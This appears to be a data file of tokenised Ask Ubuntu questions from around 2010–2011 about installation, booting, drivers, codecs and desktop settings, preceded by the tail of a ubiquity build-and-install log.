./ $ lang.gmo as '' \ `` $ dir/ubiquity.mo '' ; \ fi ; \ if test -r $ lang.gmo.m ; then \ /usr/bin/install -c -m 644 $ lang.gmo.m $ dir/ubiquity.mo.m ; \ echo `` installing $ lang.gmo.m as $ dir/ubiquity.mo.m '' ; \ else \ if test -r ./ $ lang.gmo.m ; then \ /usr/bin/install -c -m 644 ./ $ lang.gmo.m \ $ dir/ubiquity.mo.m ; \ echo `` installing ./ $ lang.gmo.m as '' \ `` $ dir/ubiquity.mo.m '' ; \ else \ true ; \ fi ; \ fi ; \ done installing af.gmo as /usr/local/share/locale/af/lc_messages/ubiquity.mo installing am.gmo as /usr/local/share/locale/am/lc_messages/ubiquity.mo installing an.gmo as /usr/local/share/locale/an/lc_messages/ubiquity.mo installing ar.gmo as /usr/local/share/locale/ar/lc_messages/ubiquity.mo installing ast.gmo as /usr/local/share/locale/ast/lc_messages/ubiquity.mo installing az.gmo as /usr/local/share/locale/az/lc_messages/ubiquity.mo installing be.gmo as /usr/local/share/locale/be/lc_messages/ubiquity.mo installing bg.gmo as /usr/local/share/locale/bg/lc_messages/ubiquity.mo installing bn.gmo as /usr/local/share/locale/bn/lc_messages/ubiquity.mo installing br.gmo as /usr/local/share/locale/br/lc_messages/ubiquity.mo installing bs.gmo as /usr/local/share/locale/bs/lc_messages/ubiquity.mo installing ca.gmo as /usr/local/share/locale/ca/lc_messages/ubiquity.mo installing cs.gmo as /usr/local/share/locale/cs/lc_messages/ubiquity.mo installing csb.gmo as /usr/local/share/locale/csb/lc_messages/ubiquity.mo installing da.gmo as /usr/local/share/locale/da/lc_messages/ubiquity.mo installing de.gmo as /usr/local/share/locale/de/lc_messages/ubiquity.mo installing el.gmo as /usr/local/share/locale/el/lc_messages/ubiquity.mo installing eo.gmo as /usr/local/share/locale/eo/lc_messages/ubiquity.mo installing es.gmo as /usr/local/share/locale/es/lc_messages/ubiquity.mo installing et.gmo as /usr/local/share/locale/et/lc_messages/ubiquity.mo installing eu.gmo as /usr/local/share/locale/eu/lc_messages/ubiquity.mo installing fa.gmo as /usr/local/share/locale/fa/lc_messages/ubiquity.mo installing fi.gmo as /usr/local/share/locale/fi/lc_messages/ubiquity.mo installing fr.gmo as /usr/local/share/locale/fr/lc_messages/ubiquity.mo installing fy.gmo as /usr/local/share/locale/fy/lc_messages/ubiquity.mo installing ga.gmo as /usr/local/share/locale/ga/lc_messages/ubiquity.mo installing gl.gmo as /usr/local/share/locale/gl/lc_messages/ubiquity.mo installing gu.gmo as /usr/local/share/locale/gu/lc_messages/ubiquity.mo installing he.gmo as /usr/local/share/locale/he/lc_messages/ubiquity.mo installing hi.gmo as /usr/local/share/locale/hi/lc_messages/ubiquity.mo installing hr.gmo as /usr/local/share/locale/hr/lc_messages/ubiquity.mo installing hu.gmo as /usr/local/share/locale/hu/lc_messages/ubiquity.mo installing hy.gmo as /usr/local/share/locale/hy/lc_messages/ubiquity.mo installing id.gmo as /usr/local/share/locale/id/lc_messages/ubiquity.mo installing is.gmo as /usr/local/share/locale/is/lc_messages/ubiquity.mo installing it.gmo as /usr/local/share/locale/it/lc_messages/ubiquity.mo installing ja.gmo as /usr/local/share/locale/ja/lc_messages/ubiquity.mo installing ka.gmo as /usr/local/share/locale/ka/lc_messages/ubiquity.mo installing kk.gmo as /usr/local/share/locale/kk/lc_messages/ubiquity.mo installing ko.gmo as /usr/local/share/locale/ko/lc_messages/ubiquity.mo installing ku.gmo as /usr/local/share/locale/ku/lc_messages/ubiquity.mo installing lb.gmo as /usr/local/share/locale/lb/lc_messages/ubiquity.mo installing lt.gmo as /usr/local/share/locale/lt/lc_messages/ubiquity.mo installing lv.gmo as /usr/local/share/locale/lv/lc_messages/ubiquity.mo installing mk.gmo as /usr/local/share/locale/mk/lc_messages/ubiquity.mo installing ms.gmo as /usr/local/share/locale/ms/lc_messages/ubiquity.mo installing nb.gmo as /usr/local/share/locale/nb/lc_messages/ubiquity.mo installing ne.gmo as /usr/local/share/locale/ne/lc_messages/ubiquity.mo installing nl.gmo as /usr/local/share/locale/nl/lc_messages/ubiquity.mo installing nn.gmo as /usr/local/share/locale/nn/lc_messages/ubiquity.mo installing no.gmo as /usr/local/share/locale/no/lc_messages/ubiquity.mo installing oc.gmo as /usr/local/share/locale/oc/lc_messages/ubiquity.mo installing pl.gmo as /usr/local/share/locale/pl/lc_messages/ubiquity.mo installing pt.gmo as /usr/local/share/locale/pt/lc_messages/ubiquity.mo installing pt_br.gmo as /usr/local/share/locale/pt_br/lc_messages/ubiquity.mo installing ro.gmo as /usr/local/share/locale/ro/lc_messages/ubiquity.mo installing ru.gmo as /usr/local/share/locale/ru/lc_messages/ubiquity.mo installing sd.gmo as /usr/local/share/locale/sd/lc_messages/ubiquity.mo installing sk.gmo as /usr/local/share/locale/sk/lc_messages/ubiquity.mo installing sl.gmo as /usr/local/share/locale/sl/lc_messages/ubiquity.mo installing sq.gmo as /usr/local/share/locale/sq/lc_messages/ubiquity.mo installing sr.gmo as /usr/local/share/locale/sr/lc_messages/ubiquity.mo installing sv.gmo as /usr/local/share/locale/sv/lc_messages/ubiquity.mo installing ta.gmo as /usr/local/share/locale/ta/lc_messages/ubiquity.mo installing tg.gmo as /usr/local/share/locale/tg/lc_messages/ubiquity.mo installing th.gmo as /usr/local/share/locale/th/lc_messages/ubiquity.mo installing tl.gmo as /usr/local/share/locale/tl/lc_messages/ubiquity.mo installing tr.gmo as /usr/local/share/locale/tr/lc_messages/ubiquity.mo installing uk.gmo as /usr/local/share/locale/uk/lc_messages/ubiquity.mo installing vi.gmo as /usr/local/share/locale/vi/lc_messages/ubiquity.mo installing zh_cn.gmo as /usr/local/share/locale/zh_cn/lc_messages/ubiquity.mo installing zh_hk.gmo as /usr/local/share/locale/zh_hk/lc_messages/ubiquity.mo installing zh_tw.gmo as /usr/local/share/locale/zh_tw/lc_messages/ubiquity.mo make [ 1 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/po' making install in ubiquity make [ 1 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/ubiquity' make [ 2 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/ubiquity' test -z `` /usr/local/lib/python2.6/dist-packages/ubiquity '' || /bin/mkdir -p `` /usr/local/lib/python2.6/dist-packages/ubiquity '' /bin/bash ../libtool -- mode=install /usr/bin/install -c _osextras.la '/usr/local/lib/python2.6/dist-packages/ubiquity' libtool : install : /usr/bin/install -c .libs/_osextras.so /usr/local/lib/python2.6/dist-packages/ubiquity/_osextras.so libtool : install : /usr/bin/install -c .libs/_osextras.lai /usr/local/lib/python2.6/dist-packages/ubiquity/_osextras.la libtool : install : /usr/bin/install -c .libs/_osextras.a /usr/local/lib/python2.6/dist-packages/ubiquity/_osextras.a libtool : install : chmod 644 /usr/local/lib/python2.6/dist-packages/ubiquity/_osextras.a libtool : install : ranlib /usr/local/lib/python2.6/dist-packages/ubiquity/_osextras.a libtool : finish : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/x11r6/bin : /sbin '' ldconfig -n /usr/local/lib/python2.6/dist-packages/ubiquity -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- libraries have been installed in : /usr/local/lib/python2.6/dist-packages/ubiquity if you ever happen to want to link against installed libraries in a given directory , libdir , you must either use libtool , and specify the full pathname of the library , or use the `-llibdir' flag during linking and do at least one of the following : - add libdir to the `ld_library_path ' environment variable during execution - add libdir to the `ld_run_path ' environment variable during linking - use the `-wl , -rpath -wl , libdir ' linker flag - have your system administrator add libdir to `/etc/ld.so.conf' see any operating system documentation about shared libraries for more information , such as the ld ( 1 ) and ld.so ( 8 ) manual pages . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/ubiquity' make [ 1 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/ubiquity' making install in src make [ 1 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/src' making install in panel make [ 2 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/src/panel' make [ 3 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/src/panel' test -z `` /usr/local/lib/ubiquity '' || /bin/mkdir -p `` /usr/local/lib/ubiquity '' /bin/bash ../../libtool -- mode=install /usr/bin/install -c panel '/usr/local/lib/ubiquity' libtool : install : /usr/bin/install -c panel /usr/local/lib/ubiquity/panel make [ 3 ] : nothing to be done for `install-data-am ' . make [ 3 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/src/panel' make [ 2 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/src/panel' making install in cheese make [ 2 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/src/cheese' make [ 3 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/src/cheese' test -z `` /usr/local/lib/python2.6/dist-packages/ubiquity '' || /bin/mkdir -p `` /usr/local/lib/python2.6/dist-packages/ubiquity '' /bin/bash ../../libtool -- mode=install /usr/bin/install -c cheese.la '/usr/local/lib/python2.6/dist-packages/ubiquity' libtool : install : /usr/bin/install -c .libs/cheese.so /usr/local/lib/python2.6/dist-packages/ubiquity/cheese.so libtool : install : /usr/bin/install -c .libs/cheese.lai /usr/local/lib/python2.6/dist-packages/ubiquity/cheese.la libtool : install : /usr/bin/install -c .libs/cheese.a /usr/local/lib/python2.6/dist-packages/ubiquity/cheese.a libtool : install : chmod 644 /usr/local/lib/python2.6/dist-packages/ubiquity/cheese.a libtool : install : ranlib /usr/local/lib/python2.6/dist-packages/ubiquity/cheese.a libtool : finish : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/x11r6/bin : /sbin '' ldconfig -n /usr/local/lib/python2.6/dist-packages/ubiquity -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- libraries have been installed in : /usr/local/lib/python2.6/dist-packages/ubiquity if you ever happen to want to link against installed libraries in a given directory , libdir , you must either use libtool , and specify the full pathname of the library , or use the `-llibdir' flag during linking and do at least one of the following : - add libdir to the `ld_library_path ' environment variable during execution - add libdir to the `ld_run_path ' environment variable during linking - use the `-wl , -rpath -wl , libdir ' linker flag - have your system administrator add libdir to `/etc/ld.so.conf' see any operating system documentation about shared libraries for more information , such as the ld ( 1 ) and ld.so ( 8 ) manual pages . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test -z `` /usr/local/share/pygobject/2.0/defs '' || /bin/mkdir -p `` /usr/local/share/pygobject/2.0/defs '' /usr/bin/install -c -m 644 cheese.defs '/usr/local/share/pygobject/2.0/defs' make [ 3 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/src/cheese' make [ 2 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/src/cheese' make [ 2 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/src' make [ 3 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/src' make [ 3 ] : nothing to be done for `install-exec-am ' . make [ 3 ] : nothing to be done for `install-data-am ' . make [ 3 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/src' make [ 2 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/src' make [ 1 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/src' make [ 1 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity' make [ 2 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity' make [ 2 ] : nothing to be done for `install-exec-am ' . make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity' make [ 1 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity'
22504	boot menu does n't show up after installing windows 7	i installed ubuntu 10.10 on my shiny new asrock vison 3d with no apparent problems . still i need some windows-only software from time to time and went on installing win7 afterwards . now win7 happily boots but apparently has not bothered with creating a boot menu ... i assume that using a ubuntu 10.10 live-cd there should be a way to create a
22505	how do i reduce package content on a custom install cd ?	i normally do all my installs via pxe server , but i 'm building a custom cd for kvm installs that are not on the same vlan as my pxe server . i would prefer this cd was as small as possible and it fetched packages from the network like netinstall mini.iso cd does , but netinstall does n't mount /cdrom like the server install cd does . i need the cdrom for preseed . i 've got my custom server install cd working , but it is still ~700mb . trying to modify `` dists/lucid/main/binary-amd64/packages.gz '' gives me no love as it complains that i 've got a corrupt packages.gz no matter what i do . i 'd rather the preseeded mirror was used rather than cd once it gets the cdrom setup . any ideas ?
22507	does ubuntu prevent customization of pynotify notifications ?	does anyone know why i 'm unable to change notification settings using pynotify ? i can create a notification , modify it ( for example so it should show up in the middle of my display ) , and tell it to display , but it still shows up in the upper-right corner . and if this is configurable , anyone know how to do so ? i 'm running ubuntu 10.10 , using fluxbox . here is the function that displays the notification : def displaynotification ( msg ) : `` '' '' display the given notification . '' '' '' if not pynotify.init ( `` hey '' ) : displayerror ( `` unable to initialize notification library ... '' ) n = pynotify.notification ( `` hey ! `` , msg ) n.set_hint ( `` x '' ,400 ) n.set_hint ( `` y '' ,400 ) n.set_timeout ( 2 * 3600 * 1000 ) if not n.show ( ) : displayerror ( `` unable to show notification ... '' ) this worked exactly as expected under arch linux , before i switched to ubuntu .
22509	how to access to cisco 's serial port using an usb-adapter ?	i should connect to a cisco router by serial port , someone suggested me to use an usb-adapter , i did it . of following , i show you the screen of the commands lsusb and dmesg lsusb : bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 03f0:171d hewlett-packard wireless ( bluetooth + wlan ) interface [ integrated module ] bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub ***bus 003 device 003 : id 0403:6001 future technology devices international , ltd ft232 usb-serial ( uart ) ic*** bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 007 : id 12d1:1001 huawei technologies co. , ltd. e620 usb modem bus 001 device 003 : id 05ca:1810 ricoh co. , ltd pavilion webcam [ r5u870 ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub dmesg | grep usb [ 10305.290155 ] usb 3-1 : usb disconnect , address 2 [ 10309.642637 ] usb 3-1 : new full speed usb device using uhci_hcd and address 3 [ 10309.851294 ] usb 3-1 : detected ft232rl [ 10309.851299 ] usb 3-1 : number of endpoints 2 [ 10309.851304 ] usb 3-1 : endpoint 1 maxpacketsize 64 [ 10309.851308 ] usb 3-1 : endpoint 2 maxpacketsize 64 [ 10309.851312 ] usb 3-1 : setting maxpacketsize 64 [ 10309.852239 ] usb 3-1 : ftdi usb serial device converter now attached to ttyusb0 i 've installed minicom and configured it inserting /dev/ttyusb0 as port and set the bps/par/bits with the value 9600 8n1 i 've tried to connect to it but minicom does n't work . someone can help me ? ? ? ? i do n't want to use windows with putty ! ! ! ! thank you in advance .
22510	uninstalling application built from source	i know that ubuntu has come a long way in helping new users to get used to their linux system..and making things as easy as possible . one most important aspect is installing and uninstalling applications in ubuntu . thanks to ubuntu software center it is a breeze ! however i noticed that when i compiled and installed a game from its source ( battleship ) , it does not appear under the history tab in the ubuntu software center . and also you can not uninstall it through the software center but have to resort to the command line to do this . i do not mind doing it however i am sure some other users might not be comfortable with this . is this a bug ?
22512	how can i delay dropbox from starting , but not disable it ?	when i log into my user account on ubuntu 10.10 , there is a unsatisfying delay before my system becomes usable . even launching a terminal , i have to wait a few seconds before the bash prompt appears . during this start-up period , the top process seems to be dropbox . i 'm not sure what it 's doing exactly ( functionality is still fine as far as i can see ) , but i do know it really does n't need to be doing it while i 'm waiting for desktop to appear . ( this is the standard ubuntu with gnome desktop , by the way . ) what i would like to do is to be able to have a static or even dependency-based delay for dropbox to start . it would be nice if it waited for , e.g. , 10 minutes , or for my browser tabs to load and a typing pause . then it could churn away on file status or cache-chewing , and i would be happy . is there a way to do this ? thanks !
22520	strange booting problems	this is on ubuntu 10.10 desktop edition 64-bit . yesterday i installed kubuntu-desktop to give it a a try . i liked it , but decided to uninstall it . i followed these instructions : http : //www.psychocats.net/ubuntu/puregnome it all went smoothly until i restarted . now , after the splash screen ( which changed back to the default one instead of the one i had before , which was caused by installing ati drivers ) , the screen goes black and nothing happens . i tried a verbose boot but the text output stops at this point . the strange thing is , though , that liveusbs do not work either . i tried two , one that just remains on the splash screen and another that gets a black screen after boot . these liveusbs do work , i have tried them on different machines and on this computer in the past . recovery mode works , as does booting my windows 7 partition . any help would be greatly appreciated !
22521	will natty narwhall include linux 2.6.38 ?	today linus torvalds announced the 2.6.38 rc1 linux kernel . i know that maybe this kernel will be ready near the date for natty release and in that case it 's inclusion could affect ubuntu 's stability and performance , but looking at this repo i found that there is a repo for natty.. according to the announcement , the improvement for this kernel are really important , in some cases 30 % better performance , so my question is if natty will include this linux kernel 's version or not ? just i do n't know and i wanted to ask . regards my friends !
22525	about ubuntu shows wrong release	hi , i recently reinstalled my computer from a freshly downloaded cd . i did not select at any time to get an experimental version or beta . but right after the installation ( and updating ) system - > about ubuntu tells me that : you are using ubuntu 11.04 - the natty narwhal - released in april 2011 and supported until october 2012 . why is that so ? when i check software sources there are no pre-released updated enabled or other channels . is this jut a bug in about ubuntu or am i really running 10.04 . i got some sound , graphics and application issues , so i 'm wondering if this could be the reason .
22528	why does lastlog show every user as never having logged in ?	running the lastlog command correctly lists all users on my system ( same as /etc/passwd entries ) . however all are marked as **never logged in** , including the account i 'm currently logged in to . i noticed that my /var/log/lastlog file is also empty . edit : /var/log/lastlog is not empty , it is a binary file and i was trying to cat it , causing nothing to display . less displays a binary file . does anyone have any insight as to why this would happen ? i 've never manually edited /var/log/lastlog . edit : output of ls -al /var/log/lastlog : -rw-rw-r -- 1 root utmp 292584 2010-05-12 18:14 /var/log/lastlog
22532	can i make shutter use standard notifications ?	when taking a screenshot with a delay , shutter shows the countdown to when the screenshot will be taken , using its own custom notifications ( see screenshot ) . is there anyway to make shutter use the standard notifications ?
22535	how do i get japanese characters showing correctly in openoffice ?	i get little squares for japanese characters , even after installing a few japanese packages like openoffice.org-l10n-ja , language-support-fonts-ja , etc . already tried logging off and restarting openoffice , any ideas ?
22536	how can you suggest the addition of a new package ?	this bug has had a solution proposed in comment 4 which involves the addition of a new package to the system . how would i bring this to the attention of the developers ?
22539	how to search for applications in unity ?	so far when i want to run an application , i click the ubuntu button ( or whatever it 's called in the upper left ) , then games , then all applications , then i can either select or search for an application . is that really the best way ? the `` games '' part really throws me : )
22540	how to set port forwarding to use terminal server client ?	i 'm using the terminal server client in ubuntu to connect to a windows machine in another location but i do n't get it to work . i wonder what should be the port forwarding setting so i can connect . so far i 've managed to connect to a windows machine on the same house , but what about in another locations ?
22542	how to sync other files than the ubuntu one folder in windows ?	i 'm a total newbie to ubuntu , had a smart computer guy make it so that i 'm dual booting ubuntu and vista on one laptop so i can play around with ubuntu and probably eventually switch my whole hard drive over to it . it 's great so far . i 'm using ubuntu one on , well , ubuntu , and i 'm running the beta on windows . on ubuntu i totally understand how to manage it . on windows ... not so much . so ... .how do i sync other folders besides my ubuntuone folder ( on windows vista ) ?
22545	mobile broadband quick connect..how to ?	i have a reliance broadband + mobile broadband connection . it connects fine , but the only problem is it takes more than 2 -3 mins to get the connection started . if i plug in the usb datacard , the network manager applet dothes not show up the mobile broadband connection immediately . it takes a good 2-3 mins to detect the connection before i can select reliance connection from the dropdown list . is there any way of getting a shortcut of that connection on the desktop or on the panel ? thanks , sayantan
22548	how do i know what physical drives/partitions are behind my /dev/mapper/isw_dghbbcaabe_raid_volume11 ?	this is a just upgraded ubuntu 10.04.1 lts machine . the /dev/mapper/isw_dghbbcaabe_raid_volume11 is `` new '' to the upgrade but i don´t know what physical drives/partitions are included in the `` device '' . i have tried root @ barabasi : ~ # blkid /dev/sda1 : uuid= '' 8258e116-265a-4797-59d1-fae72a643620 '' type= '' swap '' /dev/sdb : type= '' isw_raid_member '' /dev/mapper/isw_dghbbcaabe_raid_volume11 : uuid= '' 1d4721b1-5649-4772-8a03-5c3db81eba1b '' type= '' ext3 '' /dev/mapper/isw_dghbbcaabe_raid_volume15 : uuid= '' b9a639af-dee8-4e0c-90f6-15432efac4f2 '' type= '' swap '' and root @ barabasi : ~ # ls -alh /dev/disk/by-uuid/ total 0 drwxr-xr-x 2 root root 100 2011-01-14 12:49 . drwxr-xr-x 5 root root 100 2011-01-14 12:49 .. lrwxrwxrwx 1 root root 41 2011-01-14 12:49 1d4721b1-5649-4772-8a03-5c3db81eba1b - > ../../mapper/isw_dghbbcaabe_raid_volume11 lrwxrwxrwx 1 root root 10 2011-01-14 12:49 8258e116-265a-4797-59d1-fae72a643620 - > ../../sda1 lrwxrwxrwx 1 root root 41 2011-01-14 12:49 b9a639af-dee8-4e0c-90f6-15432efac4f2 - > ../../mapper/isw_dghbbcaabe_raid_volume15 but i still don´t know what physical drives are involved .
22555	screenshot tool that saves shots directly , without asking for a filename	i know how to take a screenshot , but i want to take many screenshots within a limited time ( taking screenshots of a single execution of a program which i can not pause ) . is there a program that takes the `` prtscr '' keyboard key in charge and just stores every screenshot without asking ? the standard ubuntu tool pops up a dialog to ask where i want to save the file , i would like a tool that does n't ask and just saves on the desktop or wherever as 00001.png 00002.png etc .
22558	are there any goals for the update manager behavior with unity ?	the notification tray approach to the update manager has been discarded in favor of a pop-under window to increase awareness of updates . with a complete redesign in shell behavior upcoming are there any plans on changing the behavior still some more ? will the behavior remain largely unchanged - a minimized icon ( possibly flashing ? ) in the launcher ?
22559	fstab for goflex home 2tb nas	i have the above functioning ok using the usb print server , however , i can not get the drives to mount in the fstab . using 192.168.0.x net with dlink router . i can moount using the gui in gnome but i want the drive to mount automatically
22562	copy all bridge traffic to a specific interface	i have a bridge/switch set up an a machine that has multiple ports . occasionally , i have a vm running through virtualbox , and i 'll have it use a virtual adapter and then i add the adapter to the bridge . i have heard that some switches can copy all the traffic they see to a specific port on the bridge , usually for network monitoring . i would like to be able to run some windows based network tools . i do not want to run windows on the actual hardware , because it would be lots of work to duplicate my setup in windows , so i was thinking if i can copy all traffic to a port , i can send it to a vm with windows . how can i set this up ? i think this might be ebtables area , but i do n't know ebtables well enough to know for sure , and it always seems like ( from my understanding of ebtables ) ebtables does something with the traffic ( drop , accept , etc ) , but never copies it .
22568	how to programatically manipulate application windows ?	anyone know a library , preferably for ruby or python , that will let you access a list of open applications and let you manipulate them ? all i really want to be able to do is change their geometry and minimize or close them . i 've been messing around with ruby-gnome2 a bit but have n't found anything for manipulating windows other than the ones of your own process . i 'm using 10.10 .
22572	why does n't desktop unlock screen accept my password ?	to unlock a my computer after waking it from standby or screen saver i sometimes have to enter my password many times before it 's accepted . what 's wrong with it ? update : not a wireless keyboard - a plain wired dell rt7d50 usb keyboard and the laptop 's built-in keyboard , same behaviour . all the dots do appear . sometimes switching language to a different and back to english seems to help . there are no problems with keyboards in any other case - only when entering the password in wakeup unlock dialogue . for example when i install applications or reconfigure something and the system asks to enter the password - it is always accepted immediately .
22577	after login in the desktop remains blank	i have installed ubuntu 10 last night and finished all upgrading stuff , in the time when updates are applied i downloaded a torrent file . as soon as download is finished i rebooted my system . as usual at start up it asked my login and i did the same . after a successful login it should show me the desktop , or show an error message in case anything has gone wrong . but what i had is only a cursor and a blank wall paper . can anybody tell me what is the problem and how to resolve this ? thanks
22585	how to set up accounts lan jabber chat server ?	how can i implement a jabber chat server on ubuntu with clients on windows ? server part is almost installed as per jabber and ubuntu guide how to create users account and authenticate them using mysql . how are clients enabled and configured to authenticate and join on the server . does anything need to be done for the dns part ?
22587	patches and translations	when changing a string of text as a part of a patch , how should the translation in the .po files be handled ? for example , a recent paper cut i 've worked on involved changing the string `` reboot anyway '' to `` restart anyway '' when gnome-session detected applications still running during restart . when i greped for the offending string , i found not only the string on the gtk button , but identical strings in a long list of .po files which i later learned contained translations . the format of these translations of along the lines of msgid : reboot anyway < translated text > changing the text of only the button would results in a discrepancy between the text on the english button and the translation , and changing the msgid line would result in a similar situation . how should i raise the issue that new translations are needed ? i know this is a trivial problem in this example , but there are other such bugs that involve rewriting entire paragraphs of text .
22588	how to prevent ubuntu to change theme automatically	suddenly after restart my default theme turned into a theme like this , every time i change the theme it gets changed into a custom theme like this can somebody tell me how can i find the cause of this problem thanks
22589	how can i change the mouse 's wheel scroll rate ?	i 'm using chrome , and the scroll rate is like 3 lines , and it 's painfully slow . my finger gets tired really quickly on long pages . system → preferences → mouse lacks any scroll wheel configuration options .
22592	is it safe to rename special user folders ?	i 'd like to know if it 's safe to rename user folders like `` desktop '' , `` documents '' , `` music '' ( i want them to start lowercase ) ? are there any programs in a default installation of ubuntu ( 10.10/11.04 ) that expect those folders to exist and that can not be configured to use different ones ?
22596	freezing at login screen	diagnosis : i 'm running ubuntun 10.04 . it has been running smoothly for pleny of time ( 8~9 months ) . i 've done the clean install ( not upgrading ) . one day i left the screen locked and when i returned it was frozen . i restarted and it froze in the login screen ( sometimes when i restart it actually log in my account , but freezes right after some minutes ) . the mouse pointer still moves . i still can log in remotely through ssh , even though the system is frozen . so i suspect it has to do with the gui . it seems the same problem in this question . so i followed the recommendations : here 's the output of my /var/log/xorg.0.log i think the error started in here : ( ww ) jan 21 11:29:46 nvidia ( 0 ) : wait ( 2 , 6 , 0x8000 , 0x00007b6c , 0x0000aa04 ) [ mi ] eq overflowing . the server is probably stuck in an infinite loop . it seems to be a problem with my video card . how to detect if it was a driver failure or a hardware one ? ( i can post additional information if needed ) thanks ,
22597	youtube uploader ?	are there any desktop applications for uploading video to youtube ?
22600	open or convert .cdr files ?	i have a scanned image , and it 's in corel draw ( .cdr ) format ( ~6mb ) . is there a way to open it , or convert it to something that i can manage ? i tried http : //filespazz.com/ a few times , but it did n't work due to some timeout error . any suggestions ? thanks in advance .
22602	two gedit plugins clash . how to change shortcut keys , or enable/disable a plugin	gedit has two plugins from gnome 's gedit plugins page which i both particularly want ... multi-edit control your tabs however they both vie for the same shortcut keys : ctrl+pageup and ctrl+pagedown i can see two possible solutions , and maybe there are more , , , ( there usually is : ) the best solution may be to change the shorcut keys in multi-edit to shift+ctrl+pageup and shift+ctrl+pagedown ... but i 've very little python knowledge , and how to do it escapes me.. the simplest method ( for me ) is to just toggle them on/off via another shortcut-key . i know the command to toggle the multi-edit feature on/off ( but not the entire script ) ... basically , for this option , i need a command to toggle a gedit plugin on/off.. either , or both ( , or other ) solutions would be appreciated ... update : i 'm looking for a command-line command ( vs , a menu command ) , and/or a 'fix ' for multi-edit 's python script . note : the 'edit shortcuts ' plugin does not show the multi-edit plugin ... ( so i ca n't do it that way )
22607	remove note about sudo that appears when opening the terminal	whenever i open the terminal , to run a command as administrator ( user `` root '' ) , use `` sudo < command > '' . see `` man sudo_root '' for details . appears before the terminal . how do i get that to go away ?
22608	how to play .mp4 movies ?	i have a .mp4 movie ( it 's an .mp4 file , and the `` video codec '' is xvid , and the `` audio codec '' is mp3 ) that i want to play , but when i try to open it in mplayer , it says `` the steam is encrypted and decryption is not supported . '' i tried to apply the answer from this question and this wiki page , but neither worked . any suggestions ? the file came from an [ apparently ] less than reputable site , which i guess i ca n't link to . : ( i 've tried : sudo apt-get install ubuntu-restricted-extras sudo apt-get install libdvdread4 sudo /usr/share/doc/libdvdread4/install-css.sh sudo apt-get install gstreamer0.10-ffmpeg sudo apt-get install w64codecs sudo apt-get update
22609	spanish characters on a ( fr_ca ) qwerty keyboard	i 've just spent about half an hour reading forums and such , so in short of finding a working solution , i ask this here . all solutions found so far consist of english ( us ) keyboards writing spanish characters , while it may work for them , i use a fr_ca which already contains some accented characters ( plus the letters on my keyboard are fr_ca ) . therefore , i tried activating the `` compose key position '' and `` enable extra typographic characters '' , etc . but i find no way to write inverted ! and ? or ñ , etc . on my keyboard . anyone know how ? using the character map is getting tiresome . thanks ! ** update ** setting the `` compose key position '' to `` right ctrl '' makes the ñ work by pressing altchr + right ctrl + ~ and then n = ñ now i 'd love to be able to map custom chars to key combos : ) i 'd map something for the ¡ and ¿ chars ( and other accented letters ) , etc . ** update 2 ** as stated by pit , enabling the `` compose key position '' works also with ¡ and ¿ by pressing right ctrl + shift + 1 ( x2 ) = ¡ right ctrl + shift + 6 ( x2 ) = ¿ altchr + ´ then o = ó etc solution accepted !
22613	the simplest workspace switcher ?	i do n't need any workspace previews or big workspace switcher widgets . i just want simple workspace switcher like on ios springboard . any suggestions ?
22617	crash on shutdown when using second monitor	i have recently added a second monitor to my setup . instead of one vga monitor , i now have one vga and one dvi monitor hooked up to the computer . the displays work just fine . however , ever since this monitor was added ubuntu ( 10.10 ) does not shut down properly . i go to shutdown and it starts shutting down but just hangs and i need to manually shut it down . this has been like this for weeks and i feel not comfortable shutting it down this way over and over again . has anybody any idea what this can be ? or , also useful , does anybody know how to get some info on why this crash occurs ? any logs that can be used for this ? thanks ! paul
22626	how can i expand the size of my ubuntu installation without reinstalling ?	about a week ago i used the windows installer to install ubuntu to an extra hard drive i had because i 've heard so much about it . since [ i guess ] wubi is meant for people with limited disk space who want to dual boot , it only allocates 30g of space to ubuntu . my situtation is that i have an extra ~170g of disk space that is n't being used , since i 'm not dual-booting from one disk . is there a way to make ubuntu use that free space without reinstalling .
